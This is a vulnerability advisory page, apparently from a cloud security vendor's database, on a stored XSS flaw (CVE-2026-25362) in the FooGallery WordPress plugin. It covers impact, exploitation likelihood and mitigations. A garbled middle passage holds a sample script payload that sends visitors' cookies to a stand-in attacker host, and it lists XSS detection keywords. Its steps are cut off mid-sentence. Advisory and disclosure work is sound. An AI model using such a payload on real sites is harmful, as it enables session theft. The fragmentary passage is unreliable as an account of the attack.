
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-25362 is a Stored Cross-Site Scripting (XSS) vulnerability in the FooPlugins FooGallery WordPress plugin. It affects all versions of FooGallery up to and including 3.1.11, and is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The vulnerability was published on February 19, 2026, and carries a CVSS v3.1 base score of 5.9 (Medium) (Feedly).
The vulnerability stems from insufficient input sanitization and output escaping within the FooGallery plugin, allowing authenticated attackers with high privileges (such as administrators) to inject malicious scripts into web pages (CWE-79). The stored XSS payload is persisted server-side and executed in the browsers of users who subsequently visit the affected page, with the scope of impact extending beyond the originating user session. Exploitation requires both high-privilege authentication and user interaction (a victim visiting the affected page), limiting the attack surface compared to unauthenticated XSS variants (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and defacement of gallery content. Given the high-privilege requirement for injection, the primary risk scenario involves a compromised or malicious administrator account being used to target site visitors or lower-privileged users. Confidentiality, integrity, and availability impacts are all rated low, reflecting the limited but real risk of data exposure and content manipulation (Feedly).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.029%, indicating a very low probability of exploitation in the near term. Exploitation requires high privileges and user interaction, further reducing practical exploitability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field within the gallery configuration or metadata that is not properly sanitized.<script>, javascript:, onerror=, etc.).wp_posts or plugin-specific tables containing unsanitized HTML or JavaScript in gallery metadata fields.Users should update the FooGallery plugin to a version beyond 3.1.11 as soon as a patched release is made available by FooPlugins. In the interim, site administrators should restrict access to the WordPress admin dashboard to trusted users only and review existing gallery configurations for unexpected or suspicious content. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide additional defense-in-depth while awaiting an official patch (Feedly, Wordfence).
The vulnerability was noted in Wordfence's weekly WordPress vulnerability report for the period of February 9–15, 2026, as part of routine disclosure coverage (Wordfence). No significant independent researcher commentary or broader media coverage has been identified for this vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."